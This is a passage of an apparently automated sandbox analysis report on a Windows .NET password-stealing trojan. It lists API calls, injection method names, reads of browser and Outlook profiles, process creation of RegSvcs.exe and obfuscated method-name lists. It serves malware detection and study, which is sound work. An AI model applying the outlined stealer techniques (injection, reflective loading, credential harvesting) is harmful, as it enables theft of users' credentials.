                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, iaBx0C70ImTHXMC3jW.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, iaBx0C70ImTHXMC3jW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, KwnJ9o9hiIrcHUfDCG.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, KwnJ9o9hiIrcHUfDCG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, KwnJ9o9hiIrcHUfDCG.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, iaBx0C70ImTHXMC3jW.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, iaBx0C70ImTHXMC3jW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.34964c0.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.3485e60.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5d90000.7.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.logJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeVirustotal: Detection: 25%
                        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, SpreadsheetName.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs.Net Code: OygV6LvT2m System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs.Net Code: OygV6LvT2m System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs.Net Code: OygV6LvT2m System.Reflection.Assembly.Load(byte[])
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_05708E78 push eax; mov dword ptr [esp], ecx0_2_05708E7C
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B596D1 push es; retn 0007h0_2_07B596D2
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07B59569 push es; retn 0007h0_2_07B5956A
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeCode function: 0_2_07C41BA3 push esp; retn 0007h0_2_07C41BA9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00E50C3D push edi; ret 2_2_00E50CC2
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeStatic PE information: section name: .text entropy: 7.9668276845634205
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, FQ5vVIWSB17NILlySd.csHigh entropy of concatenated method names: 'VTv6cVXAp', 'Hh1EG1MGX', 'c9PSA2Yfs', 'iZ9IqfOtb', 'If6X95jXC', 'Kt0huvhDZ', 'hGMIyPVMysOchB8dEM', 'Ef6qHIcdVw7Ri7Brsq', 'HZvBOAxgt', 'AioOMfSnj'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, lQt3bjCFjySeu10Avr9.csHigh entropy of concatenated method names: 's3N0keKA98', 'cuK0YUkJss', 'Idi06Mx6a8', 'X8s0EUWpn6', 'kaq0UX6ruE', 'Xvb0SDbF4H', 'Kao0IMATGl', 'GgL07isXH7', 'ijF0XZq04X', 'VOc0hbFtUj'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, NOtAo8hDHbV4S980Ea.csHigh entropy of concatenated method names: 'Te5LUf4x1l', 'OpNLIWeVIZ', 'ygF1uQb51L', 'kmO1KC67Yn', 'nI31QOn9Sa', 'r5t12abvYy', 'uv11NuKZDM', 'h601JoAKQ6', 'kJ11ytjYUY', 'eFe1HOqUbP'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, stOlycCWAUXDXt7labi.csHigh entropy of concatenated method names: 'CaFOk07u8V', 'CPROYjspV6', 'f1NO6b5G1I', 'dI4CeTiPvK1pNjrRUot', 'gG5yDkivGVhB2irduij', 'togE97i2npmnDSsmDJX', 'Pl9CQyi8YCVb6LyMjL6'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, x69TvMCoRoUJFd88L0w.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wDcOrJ4PPT', 'cY1Oph0sjt', 'KWUOMChdIl', 'VDtOD6EPgY', 'vifOlooW9P', 'l94ORq6Qhr', 'MNUOcONccG'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, UwQUc8iFGUbE1e0lM9.csHigh entropy of concatenated method names: 'EUuBbqXN2D', 'sfkB832ilw', 'iOoBukinsO', 'aRoBKM3Jfp', 'RWSBrZepnq', 'vMfBQknv44', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, N8PhylRceh4eZBQMYU.csHigh entropy of concatenated method names: 'F905saU2g1', 'DOT5x8DqBp', 'jiyBFmMI5C', 'UxbBC7MW3V', 'u8A5fEFYNT', 'sgF5adnFAE', 'Gfr5eJhqs0', 'SPL5rFnAUZ', 'BVG5pXjZOs', 'Jru5MWkM6r'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, vR30oQGrkAFCk2reXc.csHigh entropy of concatenated method names: 'Dispose', 'w0fCi22h7D', 'F7LW8YvoQh', 'jRixxlrvXR', 'JttCxt68qA', 'yPNCz4nrK3', 'ProcessDialogKey', 'qjlWFwQUc8', 'aGUWCbE1e0', 'UM9WWJKcnQ'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, jjac4rygKOuVBAQDuX.csHigh entropy of concatenated method names: 'EBQvkS8m2d', 'SbFvY9akaQ', 'gJUv6eYmpY', 'Am7vEJWCHK', 'AYJvUwUohj', 'rLHvSFlWyL', 'Pr3vIIY5yU', 'pmpv7r7Sfr', 'HJdvXNo4mT', 'zRGvhshiVk'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, fNgDLlVwKp7yITm1GO.csHigh entropy of concatenated method names: 'hyLCvaBx0C', 'rImC9THXMC', 'BGdCP8ycFK', 'rePCAsyOtA', 'k80CwEau8Y', 'RhKCtl5IMq', 'CN7vSE2lvo2ZMgbxtr', 'QQJx2c8y3NA1UtAXuM', 'JuYCCAYOdm', 'JoNComTPbd'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, KwnJ9o9hiIrcHUfDCG.csHigh entropy of concatenated method names: 'g0eogQUiDZ', 'dXnoqaOgiA', 'iyPoG6Y7FE', 'mLgo1x8sRa', 'CfPoLevAep', 'LfQomfIxtM', 'WUxovioAJ8', 'udbo9jFTrj', 'q43oZ1OTDs', 'WaNoPasiC2'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, MKcnQUxfK4ESKWpHAj.csHigh entropy of concatenated method names: 'YwV0CknXR0', 'iPg0oXxOi6', 'C710VDRxSj', 'BFO0q6cQqI', 'Hox0GecS43', 'oYX0LDhaLA', 'pVh0me5n4l', 'MDABcKR1tk', 'UPLBsvXKxv', 'vBpBiXb2eq'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, H8YrhKbl5IMqi5bCCw.csHigh entropy of concatenated method names: 'Mm3mgJFrZW', 'q4amG4TKVx', 'ILOmLotj3G', 'rc2mvxTOMj', 'qPLm9eiUQV', 'NmvLlsnDyi', 'xMOLRvJscs', 'zGLLccbo4v', 'KcELsqZfug', 'vLsLiKI6Z6'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, YHmp2TMpnj0Ol4bYvB.csHigh entropy of concatenated method names: 'ToString', 'j6ctfTWgF2', 'PW7t8xEVnp', 'HtutuIC2OC', 'sbXtKPbain', 'MCQtQAgkoR', 'm6pt2NPd9s', 'F4OtNO7YXV', 'w4YtJq9qlp', 'HINty1qRnM'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, RVotStDoL1dYM3wrYJ.csHigh entropy of concatenated method names: 'Ld95Pkf7NB', 'AdS5Aa00mN', 'ToString', 'Rnf5qegSUL', 'sOf5GknjsO', 'R9m51ZAqFb', 'Ex65LjZOFB', 'YZQ5mMgHkm', 'poa5vmE7Xl', 'omi59OfWkT'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, ptt68qsAYPN4nrK35j.csHigh entropy of concatenated method names: 'cdCBqs73CA', 'XAlBG4ZmZj', 'wPxB1eLPGh', 'fxgBLc5DTy', 'MiQBmpHAZR', 'o91Bv4BH6K', 'gEQB9MmOhi', 'A0RBZCcZOd', 'T8qBPi566T', 'lsrBAhZWqb'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, XFYg8MeV9E8pqPhPOM.csHigh entropy of concatenated method names: 'gPIT7me1Jk', 'm8UTXYDjDU', 'A7HTbLi1sY', 'YuCT85furc', 'QbjTKCgX7U', 'gRkTQ0ucu3', 'g4oTNDc8wA', 'JlXTJEDkGQ', 'nIqTHWVdK9', 'gO3TfvjW6R'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, YuYPHUXGd8ycFKBePs.csHigh entropy of concatenated method names: 'vx41ErlVXM', 'Xmn1S4Xahu', 'ctP17HIy8v', 'pQY1XiwN9F', 'aKu1wp6ViF', 'na61t8oN2x', 'muI15VcmD0', 'dAZ1Bcs0og', 'Oj810R67Pd', 'YVu1OD1DU8'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, evO3OhNqvdpcTnHPi9.csHigh entropy of concatenated method names: 'AWJvqtPNoi', 'Hvvv1VFIRK', 'mGKvmeXgej', 'lHWmx6kuJa', 'Pw1mz0Blw6', 'jt3vFtBVFI', 'YWFvCZeRdn', 'sbSvWPnTDn', 'LVMvohoPjw', 'kkcvVpAGgX'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, cWqDldrDf5gHB0qqkS.csHigh entropy of concatenated method names: 'MATwHGEqLR', 'vuSwabWukp', 'z0GwrAhZOt', 'Gw6wp9HZO6', 'B0Gw8rZvOO', 'YAfwu27V9e', 'KLUwKekmEd', 'ATWwQiPC7D', 'NCyw2xR54p', 'XUtwNZbGT2'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, iaBx0C70ImTHXMC3jW.csHigh entropy of concatenated method names: 'mhYGrLoUHI', 'nJ4GprFoOW', 'G3bGMgGEwA', 'EIiGD0G5rZ', 'JqVGlZtR3N', 'U9PGR1Ql1r', 'eekGciIDak', 'JI7GsplTkK', 'DpNGirg7Wo', 'YuYGxu1kPh'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, FQ5vVIWSB17NILlySd.csHigh entropy of concatenated method names: 'VTv6cVXAp', 'Hh1EG1MGX', 'c9PSA2Yfs', 'iZ9IqfOtb', 'If6X95jXC', 'Kt0huvhDZ', 'hGMIyPVMysOchB8dEM', 'Ef6qHIcdVw7Ri7Brsq', 'HZvBOAxgt', 'AioOMfSnj'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, lQt3bjCFjySeu10Avr9.csHigh entropy of concatenated method names: 's3N0keKA98', 'cuK0YUkJss', 'Idi06Mx6a8', 'X8s0EUWpn6', 'kaq0UX6ruE', 'Xvb0SDbF4H', 'Kao0IMATGl', 'GgL07isXH7', 'ijF0XZq04X', 'VOc0hbFtUj'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, NOtAo8hDHbV4S980Ea.csHigh entropy of concatenated method names: 'Te5LUf4x1l', 'OpNLIWeVIZ', 'ygF1uQb51L', 'kmO1KC67Yn', 'nI31QOn9Sa', 'r5t12abvYy', 'uv11NuKZDM', 'h601JoAKQ6', 'kJ11ytjYUY', 'eFe1HOqUbP'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, stOlycCWAUXDXt7labi.csHigh entropy of concatenated method names: 'CaFOk07u8V', 'CPROYjspV6', 'f1NO6b5G1I', 'dI4CeTiPvK1pNjrRUot', 'gG5yDkivGVhB2irduij', 'togE97i2npmnDSsmDJX', 'Pl9CQyi8YCVb6LyMjL6'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, x69TvMCoRoUJFd88L0w.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wDcOrJ4PPT', 'cY1Oph0sjt', 'KWUOMChdIl', 'VDtOD6EPgY', 'vifOlooW9P', 'l94ORq6Qhr', 'MNUOcONccG'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, UwQUc8iFGUbE1e0lM9.csHigh entropy of concatenated method names: 'EUuBbqXN2D', 'sfkB832ilw', 'iOoBukinsO', 'aRoBKM3Jfp', 'RWSBrZepnq', 'vMfBQknv44', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, N8PhylRceh4eZBQMYU.csHigh entropy of concatenated method names: 'F905saU2g1', 'DOT5x8DqBp', 'jiyBFmMI5C', 'UxbBC7MW3V', 'u8A5fEFYNT', 'sgF5adnFAE', 'Gfr5eJhqs0', 'SPL5rFnAUZ', 'BVG5pXjZOs', 'Jru5MWkM6r'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, vR30oQGrkAFCk2reXc.csHigh entropy of concatenated method names: 'Dispose', 'w0fCi22h7D', 'F7LW8YvoQh', 'jRixxlrvXR', 'JttCxt68qA', 'yPNCz4nrK3', 'ProcessDialogKey', 'qjlWFwQUc8', 'aGUWCbE1e0', 'UM9WWJKcnQ'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, jjac4rygKOuVBAQDuX.csHigh entropy of concatenated method names: 'EBQvkS8m2d', 'SbFvY9akaQ', 'gJUv6eYmpY', 'Am7vEJWCHK', 'AYJvUwUohj', 'rLHvSFlWyL', 'Pr3vIIY5yU', 'pmpv7r7Sfr', 'HJdvXNo4mT', 'zRGvhshiVk'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, fNgDLlVwKp7yITm1GO.csHigh entropy of concatenated method names: 'hyLCvaBx0C', 'rImC9THXMC', 'BGdCP8ycFK', 'rePCAsyOtA', 'k80CwEau8Y', 'RhKCtl5IMq', 'CN7vSE2lvo2ZMgbxtr', 'QQJx2c8y3NA1UtAXuM', 'JuYCCAYOdm', 'JoNComTPbd'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, KwnJ9o9hiIrcHUfDCG.csHigh entropy of concatenated method names: 'g0eogQUiDZ', 'dXnoqaOgiA', 'iyPoG6Y7FE', 'mLgo1x8sRa', 'CfPoLevAep', 'LfQomfIxtM', 'WUxovioAJ8', 'udbo9jFTrj', 'q43oZ1OTDs', 'WaNoPasiC2'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, MKcnQUxfK4ESKWpHAj.csHigh entropy of concatenated method names: 'YwV0CknXR0', 'iPg0oXxOi6', 'C710VDRxSj', 'BFO0q6cQqI', 'Hox0GecS43', 'oYX0LDhaLA', 'pVh0me5n4l', 'MDABcKR1tk', 'UPLBsvXKxv', 'vBpBiXb2eq'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, H8YrhKbl5IMqi5bCCw.csHigh entropy of concatenated method names: 'Mm3mgJFrZW', 'q4amG4TKVx', 'ILOmLotj3G', 'rc2mvxTOMj', 'qPLm9eiUQV', 'NmvLlsnDyi', 'xMOLRvJscs', 'zGLLccbo4v', 'KcELsqZfug', 'vLsLiKI6Z6'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, YHmp2TMpnj0Ol4bYvB.csHigh entropy of concatenated method names: 'ToString', 'j6ctfTWgF2', 'PW7t8xEVnp', 'HtutuIC2OC', 'sbXtKPbain', 'MCQtQAgkoR', 'm6pt2NPd9s', 'F4OtNO7YXV', 'w4YtJq9qlp', 'HINty1qRnM'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, RVotStDoL1dYM3wrYJ.csHigh entropy of concatenated method names: 'Ld95Pkf7NB', 'AdS5Aa00mN', 'ToString', 'Rnf5qegSUL', 'sOf5GknjsO', 'R9m51ZAqFb', 'Ex65LjZOFB', 'YZQ5mMgHkm', 'poa5vmE7Xl', 'omi59OfWkT'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, ptt68qsAYPN4nrK35j.csHigh entropy of concatenated method names: 'cdCBqs73CA', 'XAlBG4ZmZj', 'wPxB1eLPGh', 'fxgBLc5DTy', 'MiQBmpHAZR', 'o91Bv4BH6K', 'gEQB9MmOhi', 'A0RBZCcZOd', 'T8qBPi566T', 'lsrBAhZWqb'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, XFYg8MeV9E8pqPhPOM.csHigh entropy of concatenated method names: 'gPIT7me1Jk', 'm8UTXYDjDU', 'A7HTbLi1sY', 'YuCT85furc', 'QbjTKCgX7U', 'gRkTQ0ucu3', 'g4oTNDc8wA', 'JlXTJEDkGQ', 'nIqTHWVdK9', 'gO3TfvjW6R'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, YuYPHUXGd8ycFKBePs.csHigh entropy of concatenated method names: 'vx41ErlVXM', 'Xmn1S4Xahu', 'ctP17HIy8v', 'pQY1XiwN9F', 'aKu1wp6ViF', 'na61t8oN2x', 'muI15VcmD0', 'dAZ1Bcs0og', 'Oj810R67Pd', 'YVu1OD1DU8'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, evO3OhNqvdpcTnHPi9.csHigh entropy of concatenated method names: 'AWJvqtPNoi', 'Hvvv1VFIRK', 'mGKvmeXgej', 'lHWmx6kuJa', 'Pw1mz0Blw6', 'jt3vFtBVFI', 'YWFvCZeRdn', 'sbSvWPnTDn', 'LVMvohoPjw', 'kkcvVpAGgX'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, cWqDldrDf5gHB0qqkS.csHigh entropy of concatenated method names: 'MATwHGEqLR', 'vuSwabWukp', 'z0GwrAhZOt', 'Gw6wp9HZO6', 'B0Gw8rZvOO', 'YAfwu27V9e', 'KLUwKekmEd', 'ATWwQiPC7D', 'NCyw2xR54p', 'XUtwNZbGT2'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, iaBx0C70ImTHXMC3jW.csHigh entropy of concatenated method names: 'mhYGrLoUHI', 'nJ4GprFoOW', 'G3bGMgGEwA', 'EIiGD0G5rZ', 'JqVGlZtR3N', 'U9PGR1Ql1r', 'eekGciIDak', 'JI7GsplTkK', 'DpNGirg7Wo', 'YuYGxu1kPh'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, FQ5vVIWSB17NILlySd.csHigh entropy of concatenated method names: 'VTv6cVXAp', 'Hh1EG1MGX', 'c9PSA2Yfs', 'iZ9IqfOtb', 'If6X95jXC', 'Kt0huvhDZ', 'hGMIyPVMysOchB8dEM', 'Ef6qHIcdVw7Ri7Brsq', 'HZvBOAxgt', 'AioOMfSnj'
